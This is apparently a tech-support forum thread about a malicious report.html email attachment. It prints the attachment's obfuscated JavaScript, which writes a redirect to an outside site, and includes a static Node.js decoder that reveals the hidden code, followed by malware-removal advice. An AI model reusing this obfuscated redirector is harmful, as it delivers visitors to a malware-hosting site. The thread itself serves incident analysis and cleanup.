  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1056

Does Anyone Know This Malicious Attachment

Hi,

I just received one of those spam emails that had an attachment inside it from what looked like a person I recognised. The attachment had a not too unfamiliar name, report.html, and I opened it with Firefox.

The attachment was a few lines of javascript which I have included below for reference and appear to be part of the jsunpack tool.

After clicking on the attachment, a line of text appeared in the browser along the lines of "please wait a few seconds". At this point I right-clicked the attachment and ran an AVG scan on it, which reported malware.

Additionally, a window popped up which appeared to be Windows Firewall asking me if I wanted to block Windows Explorer. I clicked "Block" and then shut down the computer.

I rebooted and all seems to be OK, but the Windows Firewall message is displayed asking if I want to keep blocking Windows Explorer.

Does anyone understand the code below and know if this is a virus / trojan, so that I can find out what it does and try to remove it? I have run a full AVG scan but it doesn't report that a virus is present.

Many thanks

<script language="JavaScript" type="text/javascript">function bn6s(m0ga){var
lpr5,co7a="",idmu,s1d5="goac>tep \":/;iv=b-nq.rhfuxm0sl<",os9w,yvsg=s1d5.length;eval(unescape("%66un%63ti%6Fn b%7677%28jn%63v){%63o7%61+=%6Ancv%7D"));for(os9w=0;os9w<m0ga.length;os9w++){idmu=m0ga.charAt(os9w);lpr5=s1d5.indexOf(idmu);if(lpr5>-1){lpr5-=(os9w+1)%yvsg;if(lpr5<0){lpr5+=yvsg;}bv77(s1d5.charAt(lpr5));}else{bv77(idmu);}}eval(unescape("%64oc%75me%6Et.w%72it%65(c%6F7a)%3Bco%37a=%22%22;"));}bn6s("gs\"\"pvliv-snops<o0\"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r=");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
1 Solution
 
John JenningsOwnerCommented:
Hard to say for sure exactly what it does.

It appears to use some encryption.
 
John JenningsOwnerCommented:
On a side-note,

Go to Google and download MalwareBytes Anti-Malware, their free version. Install it, and run a scan with it. I bet it finds something.
 
hello_everybodyCommented:
It will direct you to: http://nobletree.org/x.html (that specific page doesn't exist, but the website does).

I hope that helps!
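To check that claim without loading the attachment in a browser, here is an added example (not code from the original post or from any of the answerers): a Node.js re-implementation of the bn6s() routine from the script in the question. It performs the same position-dependent substitution statically, with no eval() and no document.write(), and returns the string the original script would have written into the page. The alphabet string and the encoded argument are copied verbatim from the posted script; decodeURIComponent() is used in place of the script's unescape() calls, on the assumption (true for the plain %XX ASCII escapes used here) that both decode them identically.

```javascript
// Static decoder for the obfuscated script posted above.
// Nothing here is evaluated; the functions only return strings.

// Substitution alphabet copied verbatim from the posted script (variable s1d5).
const ALPHABET = 'goac>tep ":/;iv=b-nq.rhfuxm0sl<';

// Argument passed to bn6s() in the posted script, with the \" escapes of the
// JS string literal already resolved.
const ENCODED = 'gs""pvliv-snops<o0"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r=';

// The two eval(unescape("...")) strings from the posted script; they hide the
// helper that appends to the output buffer and the final document.write().
const EVAL_LAYERS = [
  '%66un%63ti%6Fn b%7677%28jn%63v){%63o7%61+=%6Ancv%7D',
  '%64oc%75me%6Et.w%72it%65(c%6F7a)%3Bco%37a=%22%22;',
];

// Equivalent of the script's bn6s(): a rolling Caesar cipher over ALPHABET.
// The i-th input character (0-based) is moved back by (i + 1) mod |ALPHABET|
// positions; characters outside the alphabet pass through unchanged.
function decodeBn6s(encoded, alphabet = ALPHABET) {
  const n = alphabet.length; // 31 for the posted alphabet
  let out = '';
  for (let i = 0; i < encoded.length; i++) {
    const ch = encoded[i];
    let idx = alphabet.indexOf(ch);
    if (idx === -1) {
      out += ch;
      continue;
    }
    idx -= (i + 1) % n;
    if (idx < 0) idx += n;
    out += alphabet[idx];
  }
  return out;
}

// Reveal what an eval(unescape(...)) layer would have executed.
// decodeURIComponent stands in for unescape (assumption: identical for %XX ASCII).
function revealEvalLayer(escaped) {
  return decodeURIComponent(escaped);
}

// Pull every absolute http(s) URL out of the decoded HTML.
function extractUrls(html) {
  return html.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

const decoded = decodeBn6s(ENCODED);
console.log('hidden helpers :', EVAL_LAYERS.map(revealEvalLayer));
console.log('written HTML   :', decoded);
console.log('redirect target:', extractUrls(decoded));
```

Running this with node prints the two hidden helpers (an append function and the document.write() call) and the HTML the script writes, which is a meta refresh tag whose url= points at nobletree.org/x.html. Because the decoder never executes anything, it can be run safely on the file itself rather than on a copy opened in a browser; the same approach works for other samples that use the same bn6s()-style routine by swapping in their alphabet and argument.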
 
John JenningsOwnerCommented:
 
Thomas Zucker-ScharffSystems AnalystCommented:
 
ls21gceAuthor Commented:
What is this nobletree.org website about? I clicked on this but it is some kind of investments website?
Is there really a guy on here masquerading as a "Master" just to send people to his investments site?
 
Thomas Zucker-ScharffSystems AnalystCommented:
As I said, don't go there. Whatever the site is, it isn't worth endangering your computer/identity over. Whenever you have a questionable website, if you don't use a link checker like LinkExtend, AVG LinkScanner, or Web of Trust, use F-Secure's URL checker:

https://browsingprotectionbeta.f-secure.com/swp/home
 
ls21gceAuthor Commented:
Can I just recap on your view of this embedded javascript code...

By opening this code in a browser, it will not have been able to deposit any sort of "payload" onto my computer in the form of a virus etc. Instead it is a harmless redirection to some kind of investments website in an attempt to gather business?

Thanks
 
Thomas Zucker-ScharffSystems AnalystCommented:
It is a redirection to that site, but according to the F-Secure site it is anything BUT harmless. Beware of a payload from that site.
 
Sudeep SharmaTechnical DesignerCommented:
I have saved the above code into a file and uploaded it to Virustotal.com, and it reported that at least 9 antivirus vendors found this code suspicious. Here are the ones which have detected the virus:

Engine        Version         Signature date    Detection
Authentium    5.2.0.5         2010.09.20        HTML/Redir.C
ClamAV        0.96.2.0-git    2010.09.20        JS.Generic
F-Prot        4.6.2.117       2010.09.20        HTML/Redir.C
Kaspersky     7.0.0.125       2010.09.20        Trojan-Downloader.JS.Small.ov
Microsoft     1.6201          2010.09.20        VirTool:JS/Obfuscator.W
NOD32         5465            2010.09.20        JS/Redirector.NAU
PCTools       7.0.3.5         2010.09.20        Trojan.Webkit
Sophos        4.57.0          2010.09.20        JS/WndRed-B
VirusBuster   12.65.16.0      2010.09.20        JS.Redirector.Gen.13

There is no detailed information available on the net.

http://www.securelist.com/en/descriptions/15411634/Trojan-Downloader.JS.Small.ov

Since you mentioned that AVG detected it, I think you are safe and no harmful files were downloaded to your computer.

Sudeep
 
ls21gceAuthor Commented:
Hi Sudeep,

Thanks for your comments but I am not so confident that there was no harm done to my system.

What happened was that I received the message PLEASE WAITING 4 SECOND...
Then another window popped up which looked like it was from Windows Firewall asking me if I wanted to block Windows Explorer. I immediately clicked on the "Block" button thinking I was doing the right thing, but I now suspect this was actually a fake screen designed to look like Windows Firewall and when I clicked I executed a payload. This was when my screen went blank and appeared to be scanning through files in DOS mode. I immediately executed a shutdown, but this was likely to be too late.

I have rebooted my system and the same pop-up message appeared asking if I wanted to keep blocking Windows Explorer, to which I clicked on "Keep Blocking". All seems to be working OK, but how can I tell if my computer or our network is now infected?

I have executed an AVG virus scan which shows nothing.

 
Sudeep SharmaTechnical DesignerCommented:
Just to make sure the system is clean, do the following:

Try HitmanPro to make sure anything which might be left behind is cleaned:
32bit
http://dl.surfright.nl/HitmanPro35.exe
http://download.cnet.com/Hitman-Pro-3/3000-2239_4-10895604.html

64bit
http://dl.surfright.nl/HitmanPro35_x64.exe

If issue is not resolved by these tools try TDSSKiller:
http://support.kaspersky.com/downloads/utils/tdsskiller.zip
http://support.kaspersky.com/downloads/utils/tdsskiller.exe

Tutorial on TDSSKiller:
http://support.kaspersky.com/viruses/solutions?qid=208280684

If this does not resolve your issue then try ComboFix:

Download Combofix
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
http://www.forospyware.com/sUBs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Tutorial on how to use combofix:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Post logs here for further analysis.

Sudeep
 
ls21gceAuthor Commented:
Hi Sudeep,

I have run all three of the tools you suggested. There were further .exe files identified and removed that were not seen by AVG. They were a.exe, created today in My Documents, and what looked like the same program (by size) in Application Data/Tivy/apola.exe. So it looks like this had deposited something onto my system, but what it is and whether all instances are removed is another question. I am just not sure if I can trust my system any more, as this appears to be a new threat. I can't find any reference to Tivy/apola on the net anywhere. Also it detected Variant.Kazy.711, which I can also not find.

I have also posted the logs as you suggested.

Many thanks
Combo-Fix-log.txt
Hitman-log.xml
TDSSKiller.2.4.2.1-20.09.2010-23.txt
 
Sudeep SharmaTechnical DesignerCommented:
Could you please run ComboFix one more time and paste the logs here?

Sudeep
 
ls21gceAuthor Commented:
Hi Sudeep,

I have now re-run the ComboFix tool and the log of Run2 is attached.

Thanks
Combo-Fix-log-Run2.txt
 
Sudeep SharmaTechnical DesignerCommented:
The ComboFix logs above seem pretty clean to me. Are you still noticing any suspicious EXE anywhere in the system?

Even after reboot?

Sudeep
 
ls21gceAuthor Commented:
Hi Sudeep,

I am not noticing anything out of the ordinary, apart from the odd unexpected MS Outlook abend, but I have an unnerving feeling, almost paranoia, that if I log into my online banking account or enter my credit card details there might be an undetected trojan gathering the data to be sent to a rogue website somewhere.

I would certainly feel a lot happier if one of the big anti-virus companies tested this virus to find out what it is doing.

Do you think it will now be possible to trust that this PC is clean and safe?

Thanks
 
waldosmxCommented:
Hi ls21gce, I recommend you start a topic here ;) geekstogo.com/forum/forum/37-virus-spyware-malware-removal/
 
Sudeep SharmaTechnical DesignerCommented:
Since most things have been removed, I think you are good to go. However, we could not say for sure whether there is anything else left behind. But I must say you are in a position now where you could easily take a backup of your system and do a clean install.

Sudeep
 
ls21gceAuthor Commented:
Top notch advice!
